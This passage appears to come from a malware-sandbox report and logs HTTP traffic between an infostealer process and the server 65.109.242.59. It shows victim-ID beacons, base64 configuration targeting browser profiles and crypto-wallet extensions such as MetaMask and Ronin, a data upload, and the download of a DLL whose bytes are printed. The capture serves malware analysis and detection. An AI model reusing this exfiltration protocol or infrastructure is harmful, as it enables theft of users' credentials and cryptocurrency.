                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:27:58 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:27:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:27:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.54975065.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:00 UTC278OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAEC
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 279
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:00 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 33 36 33 38 42 32 35 30 35 35 32 31 38 36 38 38 36 36 36 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d
                                                          Data Ascii: ------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="hwid"6E3638B250552186886669-a33c7340-61ca-11ee-8c18-806e6f6e6963------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------
                                                          2024-05-26 22:28:01 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:01 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 7c 31 7c 31 7c 31 7c 31 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 3a1|1|1|1|d23fa85603b96f65cdddf908b543ef9a|1|1|1|1|1|50000|10


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.54975165.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:01 UTC278OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJ
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:01 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------EGIIIECBGDHJJKFIDAKJCont
                                                          2024-05-26 22:28:02 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:02 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.54975265.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:03 UTC278OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJ
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 331
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:03 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------GDBAKEGIDBGIEBFHDHJJCont
                                                          2024-05-26 22:28:04 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:04 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                          Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.54975365.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:04 UTC278OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAE
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 332
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:04 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 45 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------HDBKFHIJKJKECAAAECAEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HDBKFHIJKJKECAAAECAECont
                                                          2024-05-26 22:28:05 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:05 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.54975465.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:06 UTC279OUTPOST / HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----IJEGHJECFCFCBFIDBGCG
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Content-Length: 5897
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:06 UTC5897OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 47 48 4a 45 43 46 43 46 43 42 46 49 44 42 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 33 66 61 38 35 36 30 33 62 39 36 66 36 35 63 64 64 64 66 39 30 38 62 35 34 33 65 66 39 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 48 4a 45 43 46 43 46 43 42 46 49 44 42 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 48 4a 45 43 46 43 46 43 42 46 49 44 42 47 43 47 0d 0a 43 6f 6e 74
                                                          Data Ascii: ------IJEGHJECFCFCBFIDBGCGContent-Disposition: form-data; name="token"d23fa85603b96f65cdddf908b543ef9a------IJEGHJECFCFCBFIDBGCGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IJEGHJECFCFCBFIDBGCGCont
                                                          2024-05-26 22:28:07 UTC158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          2024-05-26 22:28:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 2ok0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.54975565.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:07 UTC194OUTGET /sqls.dll HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Connection: Keep-Alive
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:08 UTC248INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:08 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 2459136
                                                          Last-Modified: Fri, 24 May 2024 10:18:21 GMT
                                                          Connection: close
                                                          ETag: "6650696d-258600"
                                                          Accept-Ranges: bytes
                                                          2024-05-26 22:28:08 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                          2024-05-26 22:28:08 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                          Data Ascii: X~e!*FW|>|L1146
                                                          2024-05-26 22:28:08 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                          Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                          2024-05-26 22:28:08 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                          Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                          2024-05-26 22:28:08 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                          Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                          2024-05-26 22:28:08 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                          Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                          2024-05-26 22:28:08 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                          Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                          2024-05-26 22:28:08 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                          Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
